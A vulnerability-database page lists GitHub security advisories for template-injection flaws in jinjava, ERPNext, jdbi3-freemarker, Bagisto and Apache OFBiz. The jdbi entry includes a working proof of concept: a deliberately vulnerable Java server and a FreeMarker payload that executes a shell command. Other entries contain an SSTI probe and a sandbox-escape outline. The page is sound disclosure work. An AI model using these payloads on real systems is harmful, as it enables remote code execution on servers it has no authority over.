CWE-1336
AllowedImproper Neutralization of Special Elements Used in a Template Engine
Abstraction: Base · Status: Incomplete
The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.
312 vulnerabilities reference this CWE, most recent first.
GHSA-M49C-G9WR-HV6V
Vulnerability from github – Published: 2025-09-17 19:56 – Updated: 2025-10-06 16:34Summary
jinjava’s current sandbox restrictions prevent direct access to dangerous methods such as getClass(), and block instantiation of Class objects. However, these protections can be bypassed.
By using mapper.getTypeFactory().constructFromCanonical(), it is possible to instruct the underlying ObjectMapper to deserialize attacker-controlled input into arbitrary classes. This enables the creation of semi-arbitrary class instances without directly invoking restricted methods or class literals.
As a result, an attacker can escape the sandbox and instantiate classes such as java.net.URL, opening up the ability to access local files and URLs(e.g., file:///etc/passwd). With further chaining, this primitive can potentially lead to remote code execution (RCE).
Details
jinjava templates expose a built-in variable ____int3rpr3t3r____, which provides direct access to the jinjavaInterpreter instance.
This variable was previously abused and protections were added to prevent call method from JinjavaInterpreter instances (see Add interpreter to blacklist).
However, interacting with the properties of JinjavaInterpreter instances remains unrestricted.
From ____int3rpr3t3r____, it is possible to traverse to the config field, which exposes an ObjectMapper. By invoking readValue(String content, JavaType valueType) on this ObjectMapper, an attacker can instantiate arbitrary classes specified via JavaType.
Although jinjava explicitly restricts dangerous classes such as Class, ClassLoader, and so on inside JinjavaBeanELResolver, the JavaType class itself is not restricted.
As a result, an attacker can leverage JavaType construction (constructFromCanonical) to instantiate semi-arbitrary classes without directly calling restricted methods.
This allows sandbox escape and the creation of powerful primitives.
Impact
Escape the Jinjava sandbox and instantiate a wide range of classes using JavaType. This capability can be used to read arbitrary files and to perform full read SSRF by creating network-related objects. In certain environments, depending on the available classes, this primitive can even lead to complete remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.hubspot.jinjava:jinjava"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.8.0"
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.hubspot.jinjava:jinjava"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59340"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-17T19:56:21Z",
"nvd_published_at": "2025-09-17T20:15:36Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\njinjava\u2019s current sandbox restrictions prevent direct access to dangerous methods such as `getClass()`, and block instantiation of Class objects. However, these protections can be bypassed.\n\nBy using mapper.getTypeFactory().constructFromCanonical(), it is possible to instruct the underlying ObjectMapper to deserialize attacker-controlled input into arbitrary classes. This enables the creation of semi-arbitrary class instances without directly invoking restricted methods or class literals.\n\nAs a result, an attacker can escape the sandbox and instantiate classes such as java.net.URL, opening up the ability to access local files and URLs(e.g., file:///etc/passwd). With further chaining, this primitive can potentially lead to remote code execution (RCE).\n\n### Details\n\njinjava templates expose a built-in variable `____int3rpr3t3r____`, which provides direct access to the jinjavaInterpreter instance.\nThis variable was previously abused and protections were added to prevent call method from `JinjavaInterpreter` instances (see [Add interpreter to blacklist](https://github.com/HubSpot/jinjava/commit/1b9aaa4b420c58b4a301cf4b7d26207f1c8d1165)).\nHowever, interacting with the properties of `JinjavaInterpreter` instances remains [unrestricted](https://github.com/HubSpot/jinjava/blob/jinjava-2.8.0/src/main/java/com/hubspot/jinjava/el/ext/JinjavaBeanELResolver.java#L80-L84).\n\nFrom `____int3rpr3t3r____`, it is possible to traverse to the `config` field, which exposes an ObjectMapper. By invoking `readValue(String content, JavaType valueType)` on this ObjectMapper, an attacker can instantiate arbitrary classes specified via `JavaType`.\n\nAlthough jinjava explicitly restricts dangerous classes such as `Class`, `ClassLoader`, and so on inside `JinjavaBeanELResolver`, the `JavaType` class itself is [not restricted](https://github.com/HubSpot/jinjava/blob/jinjava-2.8.0/src/main/java/com/hubspot/jinjava/el/ext/JinjavaBeanELResolver.java#L246-L262). \n\nAs a result, an attacker can leverage `JavaType` construction (`constructFromCanonical`) to instantiate semi-arbitrary classes without directly calling restricted methods.\n\nThis allows sandbox escape and the creation of powerful primitives. \n\n### Impact\nEscape the Jinjava sandbox and instantiate a wide range of classes using JavaType.\nThis capability can be used to read arbitrary files and to perform full read SSRF by creating network-related objects.\nIn certain environments, depending on the available classes, this primitive can even lead to complete remote code execution.",
"id": "GHSA-m49c-g9wr-hv6v",
"modified": "2025-10-06T16:34:52Z",
"published": "2025-09-17T19:56:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/HubSpot/jinjava/security/advisories/GHSA-m49c-g9wr-hv6v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59340"
},
{
"type": "WEB",
"url": "https://github.com/HubSpot/jinjava/commit/66df351e7e8ad71ca04dcacb4b65782af820b8b1"
},
{
"type": "PACKAGE",
"url": "https://github.com/HubSpot/jinjava"
},
{
"type": "WEB",
"url": "https://github.com/HubSpot/jinjava/releases/tag/jinjava-2.7.5"
},
{
"type": "WEB",
"url": "https://github.com/HubSpot/jinjava/releases/tag/jinjava-2.8.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "jinjava has Sandbox Bypass via JavaType-Based Deserialization"
}
GHSA-MC79-8XP6-RCW8
Vulnerability from github – Published: 2025-12-15 18:30 – Updated: 2025-12-16 21:30An SSTI (Server-Side Template Injection) vulnerability exists in the get_terms_and_conditions method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Terms and Conditions document can inject arbitrary Jinja expressions into the terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information.
{
"affected": [],
"aliases": [
"CVE-2025-66436"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-918",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-15T18:15:48Z",
"severity": "MODERATE"
},
"details": "An SSTI (Server-Side Template Injection) vulnerability exists in the get_terms_and_conditions method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Terms and Conditions document can inject arbitrary Jinja expressions into the terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information.",
"id": "GHSA-mc79-8xp6-rcw8",
"modified": "2025-12-16T21:30:52Z",
"published": "2025-12-15T18:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66436"
},
{
"type": "WEB",
"url": "https://iamanc.github.io/post/erpnext-ssti-bug-3"
},
{
"type": "WEB",
"url": "https://www.notion.so/SSTI-bug-3-239e6086eadc8020aeecdaf123e32f3d?source=copy_link"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MGGX-P7JF-JGW4
Vulnerability from github – Published: 2026-05-05 22:15 – Updated: 2026-05-05 22:15Summary
Description
An Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using jdbi3-freemarker permits attacker-influenced text to reach FreemarkerEngine.parse() as template source. This affects org.jdbi:jdbi3-freemarker through version 3.52.1.
The developer opts into FreeMarker-backed SQL templating, but does not explicitly opt into reflective Java class loading from template source.
Jdbi’s FreeMarker integration should not expose unrestricted Java class instantiation by default in a SQL templating module. While the SQL injection risk is acknowledged, Jdbi’s documentation explicitly supports and demonstrates dynamic SQL templating through defined attributes, including substitution of non-bindable SQL elements such ORDER BY columns.
Details
Jdbi constructs the underlying freemarker.template.Configuration with DEFAULT_INCOMPATIBLE_IMPROVEMENTS and never installs a TemplateClassResolver, so Freemarker's legacy UNRESTRICTED_RESOLVER remains active and the ?new built-in can instantiate arbitrary classes, including freemarker.template.utility.Execute.
Two Configuration instances are constructed in the module, neither of which is hardened:
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerConfig.java
public FreemarkerConfig() {
freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
freemarkerConfiguration.setNumberFormat("computer");
}
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerSqlLocator.java
static {
Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
c.setNumberFormat("computer");
CONFIGURATION = c;
}
The locator's CONFIGURATION is initialized once at class load and used by the deprecated static findTemplate(Class, String). It cannot be replaced via FreemarkerConfig#setFreemarkerConfiguration(...), so any fix must land in both call sites.
The sink is FreemarkerEngine.parse(), which constructs a Template from the raw SQL string and renders it against ctx.getAttributes():
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerEngine.java
Template template = new Template(null, sqlTemplate,
config.get(FreemarkerConfig.class).getFreemarkerConfiguration());
return Optional.of(ctx -> {
StringWriter writer = new StringWriter();
template.process(ctx.getAttributes(), writer);
return writer.toString();
});
Freemarker is the only built-in engine whose parse path provides reflective class loading by default.
Impact
This impacts all jdbi3-freemarker releases through 3.52.1. Exploitation requires that an application depend on jdbi3-freemarkerand allow request-derived text to flow into a SQL template body passed to Handle.createQuery(String), createUpdate(String), createCall(String), createScript(String), or Batch.add(String), or into a defined attribute that the template subsequently re-evaluates with ?eval or ?interpret.
An application that allows attacker-influenced text to become FreeMarker template source, either directly through a SQL string passed to Jdbi or indirectly through a trusted template that applies ?eval / ?interpret to an attacker-influenced defined attribute, can become an RCE sink in the application JVM.
Proposed Patch
The injection surface is the Configuration constructed by Jdbi on the application's behalf without a class-resolver policy.
FreemarkerConfig and FreemarkerSqlLocator's static initializer should not allow SQL templates to instantiate arbitrary Java classes by default. Callers that genuinely need reflective ?new can override the Configuration via FreemarkerConfig#setFreemarkerConfiguration(...).
The static CONFIGURATION field cannot be reconfigured by application code at runtime, so a fix limited to FreemarkerConfig leaves the legacy locator path exploitable.
import freemarker.core.TemplateClassResolver;
// FreemarkerConfig.java
public FreemarkerConfig() {
freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
freemarkerConfiguration.setNumberFormat("computer");
freemarkerConfiguration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
}
// FreemarkerSqlLocator.java
static {
Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
c.setNumberFormat("computer");
c.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
CONFIGURATION = c;
}
ALLOWS_NOTHING_RESOLVER rejects every ?new lookup, which is sufficient for SQL templating.SAFER_RESOLVER also closes RCE and blocks only Execute, ObjectConstructor, and JythonRuntime, none of which a SQL template would ever need. A complete hardening also restricts the template loader to a non-root prefix.
Proof of Concept
This PoC uses direct string concatenation to simulate an application passing un-sanitized, request-derived text to the SQL template engine. The same RCE payload works if the attacker input is passed through a Jdbi @Define attribute that the template subsequently evaluates.
# Create project directory
mkdir jdbi-freemarker-poc && cd jdbi-freemarker-poc
cat > pom.xml << 'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0">
<modelVersion>4.0.0</modelVersion>
<groupId>poc</groupId>
<artifactId>jdbi-freemarker-poc</artifactId>
<version>1.0</version>
<properties>
<maven.compiler.release>17</maven.compiler.release>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>org.jdbi</groupId>
<artifactId>jdbi3-core</artifactId>
<version>3.52.1</version>
</dependency>
<dependency>
<groupId>org.jdbi</groupId>
<artifactId>jdbi3-freemarker</artifactId>
<version>3.52.1</version>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>2.2.224</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.13.0</version>
</plugin>
</plugins>
</build>
</project>
EOF
mkdir -p src/main/java
cat > src/main/java/Server.java << 'EOF'
import com.sun.net.httpserver.HttpServer;
import org.jdbi.v3.core.Jdbi;
import org.jdbi.v3.core.statement.SqlStatements;
import org.jdbi.v3.freemarker.FreemarkerEngine;
import java.net.InetSocketAddress;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
public class Server {
public static void main(String[] args) throws Exception {
Jdbi jdbi = Jdbi.create("jdbc:h2:mem:poc;DB_CLOSE_DELAY=-1");
jdbi.getConfig(SqlStatements.class)
.setTemplateEngine(FreemarkerEngine.instance());
jdbi.useHandle(h -> {
h.execute("create table users (id int, email varchar)");
h.execute("insert into users values (1,'alice@example.com'),(2,'bob@example.com')");
});
HttpServer http = HttpServer.create(new InetSocketAddress(8050), 0);
http.createContext("/search", ex -> {
String q = parseQuery(ex.getRequestURI().getRawQuery()).getOrDefault("q", "");
String sql = "select email from users where email like '%" + q + "%'";
String body;
try {
body = jdbi.withHandle(h ->
h.createQuery(sql).mapTo(String.class).list().toString());
} catch (Exception e) {
body = "error: " + e.getMessage();
}
byte[] bytes = body.getBytes(StandardCharsets.UTF_8);
ex.sendResponseHeaders(200, bytes.length);
ex.getResponseBody().write(bytes);
ex.close();
});
http.start();
System.out.println("listening on http://127.0.0.1:8050/search?q=...");
}
private static Map<String, String> parseQuery(String raw) {
Map<String, String> out = new HashMap<>();
if (raw == null) return out;
for (String pair : raw.split("&")) {
int eq = pair.indexOf('=');
if (eq < 0) continue;
out.put(URLDecoder.decode(pair.substring(0, eq), StandardCharsets.UTF_8),
URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8));
}
return out;
}
}
EOF
mvn -q package
java -cp "target/classes:$(mvn -q dependency:build-classpath -Dmdep.outputFile=/dev/stdout)" Server &
Benign Request
$ curl -s 'http://127.0.0.1:8050/search?q=alice'
[alice@example.com]
Exploit
$ curl -sG 'http://127.0.0.1:8050/search' \
--data-urlencode 'q=<#assign ex="freemarker.template.utility.Execute"?new()>${ex("touch /tmp/jdbi-pwned")}'
[alice@example.com, bob@example.com]
$ ls -la /tmp/jdbi-pwned
-rw-r--r-- 1 wodzen wodzen 0 Apr 27 02:21 /tmp/jdbi-pwned
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.52.1"
},
"package": {
"ecosystem": "Maven",
"name": "org.jdbi:jdbi3-freemarker"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.53.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T22:15:17Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# Summary\n\n**Description**\n\nAn Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using `jdbi3-freemarker` permits attacker-influenced text to reach `FreemarkerEngine.parse()` as template source. This affects `org.jdbi:jdbi3-freemarker` through version 3.52.1.\n\nThe developer opts into FreeMarker-backed SQL templating, but does not explicitly opt into reflective Java class loading from template source.\n\nJdbi\u2019s FreeMarker integration should not expose unrestricted Java class instantiation by default in a SQL templating module. While the SQL injection risk is acknowledged, Jdbi\u2019s documentation explicitly supports and demonstrates dynamic SQL templating through defined attributes, including substitution of non-bindable SQL elements such `ORDER BY` columns. \n## Details\n\nJdbi constructs the underlying `freemarker.template.Configuration` with `DEFAULT_INCOMPATIBLE_IMPROVEMENTS` and never installs a `TemplateClassResolver`, so Freemarker\u0027s legacy `UNRESTRICTED_RESOLVER` remains active and the `?new` built-in can instantiate arbitrary classes, including `freemarker.template.utility.Execute`.\n\nTwo `Configuration` instances are constructed in the module, neither of which is hardened:\n```java\n// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerConfig.java\npublic FreemarkerConfig() {\n freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);\n freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), \"/\"));\n freemarkerConfiguration.setNumberFormat(\"computer\");\n}\n```\n\n```java\n// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerSqlLocator.java\nstatic {\n Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);\n c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), \"/\"));\n c.setNumberFormat(\"computer\");\n CONFIGURATION = c;\n}\n```\nThe locator\u0027s `CONFIGURATION` is initialized once at class load and used by the deprecated static `findTemplate(Class, String)`. It cannot be replaced via `FreemarkerConfig#setFreemarkerConfiguration(...)`, so any fix must land in both call sites.\n\nThe sink is `FreemarkerEngine.parse()`, which constructs a `Template` from the raw SQL string and renders it against `ctx.getAttributes()`:\n```java\n// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerEngine.java\nTemplate template = new Template(null, sqlTemplate,\n config.get(FreemarkerConfig.class).getFreemarkerConfiguration());\nreturn Optional.of(ctx -\u003e {\n StringWriter writer = new StringWriter();\n template.process(ctx.getAttributes(), writer);\n return writer.toString();\n});\n```\n\nFreemarker is the only built-in engine whose parse path provides reflective class loading by default.\n## Impact\n\nThis impacts all `jdbi3-freemarker` releases through 3.52.1. Exploitation requires that an application depend on `jdbi3-freemarker`and allow request-derived text to flow into a SQL template body passed to `Handle.createQuery(String)`, `createUpdate(String)`, `createCall(String)`, `createScript(String)`, or `Batch.add(String)`, or into a defined attribute that the template subsequently re-evaluates with `?eval` or `?interpret`.\n\nAn application that allows attacker-influenced text to become FreeMarker template source, either directly through a SQL string passed to Jdbi or indirectly through a trusted template that applies `?eval` / `?interpret` to an attacker-influenced defined attribute, can become an RCE sink in the application JVM.\n## Proposed Patch\n\nThe injection surface is the `Configuration` constructed by Jdbi on the application\u0027s behalf without a class-resolver policy.\n\n`FreemarkerConfig`\u00a0and\u00a0`FreemarkerSqlLocator`\u0027s static initializer should not allow SQL templates to instantiate arbitrary Java classes by default. Callers that genuinely need reflective\u00a0`?new`\u00a0can override the\u00a0`Configuration`\u00a0via\u00a0`FreemarkerConfig#setFreemarkerConfiguration(...)`.\n\nThe static `CONFIGURATION` field cannot be reconfigured by application code at runtime, so a fix limited to `FreemarkerConfig` leaves the legacy locator path exploitable.\n```java\nimport freemarker.core.TemplateClassResolver;\n\n// FreemarkerConfig.java\npublic FreemarkerConfig() {\n freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);\n freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), \"/\"));\n freemarkerConfiguration.setNumberFormat(\"computer\");\n freemarkerConfiguration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);\n}\n\n// FreemarkerSqlLocator.java\nstatic {\n Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);\n c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), \"/\"));\n c.setNumberFormat(\"computer\");\n c.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);\n CONFIGURATION = c;\n}\n```\n\n`ALLOWS_NOTHING_RESOLVER` rejects every `?new` lookup, which is sufficient for SQL templating.`SAFER_RESOLVER` also closes RCE and blocks only `Execute`, `ObjectConstructor`, and `JythonRuntime`, none of which a SQL template would ever need. A complete hardening also restricts the template loader to a non-root prefix.\n\n## Proof of Concept\n\nThis PoC uses direct string concatenation to simulate an application passing un-sanitized, request-derived text to the SQL template engine. The same RCE payload works if the attacker input is passed through a Jdbi `@Define` attribute that the template subsequently evaluates.\n```bash\n# Create project directory\nmkdir jdbi-freemarker-poc \u0026\u0026 cd jdbi-freemarker-poc\n\ncat \u003e pom.xml \u003c\u003c \u0027EOF\u0027\n\u003cproject xmlns=\"http://maven.apache.org/POM/4.0.0\"\u003e\n \u003cmodelVersion\u003e4.0.0\u003c/modelVersion\u003e\n \u003cgroupId\u003epoc\u003c/groupId\u003e\n \u003cartifactId\u003ejdbi-freemarker-poc\u003c/artifactId\u003e\n \u003cversion\u003e1.0\u003c/version\u003e\n \u003cproperties\u003e\n \u003cmaven.compiler.release\u003e17\u003c/maven.compiler.release\u003e\n \u003cproject.build.sourceEncoding\u003eUTF-8\u003c/project.build.sourceEncoding\u003e\n \u003c/properties\u003e\n \u003cdependencies\u003e\n \u003cdependency\u003e\n \u003cgroupId\u003eorg.jdbi\u003c/groupId\u003e\n \u003cartifactId\u003ejdbi3-core\u003c/artifactId\u003e\n \u003cversion\u003e3.52.1\u003c/version\u003e\n \u003c/dependency\u003e\n \u003cdependency\u003e\n \u003cgroupId\u003eorg.jdbi\u003c/groupId\u003e\n \u003cartifactId\u003ejdbi3-freemarker\u003c/artifactId\u003e\n \u003cversion\u003e3.52.1\u003c/version\u003e\n \u003c/dependency\u003e\n \u003cdependency\u003e\n \u003cgroupId\u003ecom.h2database\u003c/groupId\u003e\n \u003cartifactId\u003eh2\u003c/artifactId\u003e\n \u003cversion\u003e2.2.224\u003c/version\u003e\n \u003c/dependency\u003e\n \u003c/dependencies\u003e\n \u003cbuild\u003e\n \u003cplugins\u003e\n \u003cplugin\u003e\n \u003cgroupId\u003eorg.apache.maven.plugins\u003c/groupId\u003e\n \u003cartifactId\u003emaven-compiler-plugin\u003c/artifactId\u003e\n \u003cversion\u003e3.13.0\u003c/version\u003e\n \u003c/plugin\u003e\n \u003c/plugins\u003e\n \u003c/build\u003e\n\u003c/project\u003e\nEOF\n\nmkdir -p src/main/java\ncat \u003e src/main/java/Server.java \u003c\u003c \u0027EOF\u0027\nimport com.sun.net.httpserver.HttpServer;\nimport org.jdbi.v3.core.Jdbi;\nimport org.jdbi.v3.core.statement.SqlStatements;\nimport org.jdbi.v3.freemarker.FreemarkerEngine;\n\nimport java.net.InetSocketAddress;\nimport java.net.URLDecoder;\nimport java.nio.charset.StandardCharsets;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Server {\n public static void main(String[] args) throws Exception {\n Jdbi jdbi = Jdbi.create(\"jdbc:h2:mem:poc;DB_CLOSE_DELAY=-1\");\n jdbi.getConfig(SqlStatements.class)\n .setTemplateEngine(FreemarkerEngine.instance());\n jdbi.useHandle(h -\u003e {\n h.execute(\"create table users (id int, email varchar)\");\n h.execute(\"insert into users values (1,\u0027alice@example.com\u0027),(2,\u0027bob@example.com\u0027)\");\n });\n\n HttpServer http = HttpServer.create(new InetSocketAddress(8050), 0);\n http.createContext(\"/search\", ex -\u003e {\n String q = parseQuery(ex.getRequestURI().getRawQuery()).getOrDefault(\"q\", \"\");\n String sql = \"select email from users where email like \u0027%\" + q + \"%\u0027\";\n String body;\n try {\n body = jdbi.withHandle(h -\u003e\n h.createQuery(sql).mapTo(String.class).list().toString());\n } catch (Exception e) {\n body = \"error: \" + e.getMessage();\n }\n byte[] bytes = body.getBytes(StandardCharsets.UTF_8);\n ex.sendResponseHeaders(200, bytes.length);\n ex.getResponseBody().write(bytes);\n ex.close();\n });\n http.start();\n System.out.println(\"listening on http://127.0.0.1:8050/search?q=...\");\n }\n\n private static Map\u003cString, String\u003e parseQuery(String raw) {\n Map\u003cString, String\u003e out = new HashMap\u003c\u003e();\n if (raw == null) return out;\n for (String pair : raw.split(\"\u0026\")) {\n int eq = pair.indexOf(\u0027=\u0027);\n if (eq \u003c 0) continue;\n out.put(URLDecoder.decode(pair.substring(0, eq), StandardCharsets.UTF_8),\n URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8));\n }\n return out;\n }\n}\nEOF\n\nmvn -q package\njava -cp \"target/classes:$(mvn -q dependency:build-classpath -Dmdep.outputFile=/dev/stdout)\" Server \u0026\n```\n\nBenign Request\n```bash\n$ curl -s \u0027http://127.0.0.1:8050/search?q=alice\u0027\n[alice@example.com]\n```\n\nExploit\n```bash\n$ curl -sG \u0027http://127.0.0.1:8050/search\u0027 \\\n --data-urlencode \u0027q=\u003c#assign ex=\"freemarker.template.utility.Execute\"?new()\u003e${ex(\"touch /tmp/jdbi-pwned\")}\u0027\n[alice@example.com, bob@example.com]\n\n$ ls -la /tmp/jdbi-pwned\n-rw-r--r-- 1 wodzen wodzen 0 Apr 27 02:21 /tmp/jdbi-pwned\n```",
"id": "GHSA-mggx-p7jf-jgw4",
"modified": "2026-05-05T22:15:17Z",
"published": "2026-05-05T22:15:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jdbi/jdbi/security/advisories/GHSA-mggx-p7jf-jgw4"
},
{
"type": "PACKAGE",
"url": "https://github.com/jdbi/jdbi"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "jdbi3-freemarker Vulnerable to Improper Neutralization of Special Elements Used in FreeMarker Template Engine"
}
GHSA-MQHG-V22X-PQJ8
Vulnerability from github – Published: 2026-01-02 22:51 – Updated: 2026-01-08 21:36Summary
SSTI is possible via first name and last name parameters provided by lowest-privileged users.
Details
- Go to
http://127.0.0.1:8000/and login or signup - Go to
http://127.0.0.1:8000/customer/account/profile - Now edit the first name and last name to {{7*7}}
- Notice it appears as 49
POC
- Video attached with the report: https://github.com/user-attachments/assets/f93932b5-2a57-4f34-897e-4151a5168912
Impact
This can lead to RCE, command injection.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "bagisto/bagisto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21449"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-02T22:51:40Z",
"nvd_published_at": "2026-01-02T21:16:02Z",
"severity": "HIGH"
},
"details": "### Summary\nSSTI is possible via first name and last name parameters provided by lowest-privileged users.\n### Details\n1. Go to `http://127.0.0.1:8000/` and login or signup \n2. Go to `http://127.0.0.1:8000/customer/account/profile`\n3. Now edit the first name and last name to {{7*7}}\n4. Notice it appears as 49\n\n### POC\n- Video attached with the report: https://github.com/user-attachments/assets/f93932b5-2a57-4f34-897e-4151a5168912\n\n### Impact\nThis can lead to RCE, command injection.",
"id": "GHSA-mqhg-v22x-pqj8",
"modified": "2026-01-08T21:36:05Z",
"published": "2026-01-02T22:51:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-mqhg-v22x-pqj8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21449"
},
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/commit/4144931da0014c696f9126132ce44d7cfbdb2761"
},
{
"type": "PACKAGE",
"url": "https://github.com/bagisto/bagisto"
},
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/releases/tag/v2.3.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Bagisto is vulnerable to SSTI via name parameters provided by non-admin low-privilege users"
}
GHSA-P9R8-XJX7-V86Q
Vulnerability from github – Published: 2025-03-10 15:30 – Updated: 2025-03-11 21:30Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz.
This issue affects Apache OFBiz: from 18.12.17 before 18.12.18.
It's a regression between 18.12.17 and 18.12.18. In case you use something like that, which is not recommended! For security, only official releases should be used.
In other words, if you use 18.12.17 you are still safe. The version 18.12.17 is not a affected. But something between 18.12.17 and 18.12.18 is.
In that case, users are recommended to upgrade to version 18.12.18, which fixes the issue.
{
"affected": [],
"aliases": [
"CVE-2025-26865"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-10T14:15:25Z",
"severity": "LOW"
},
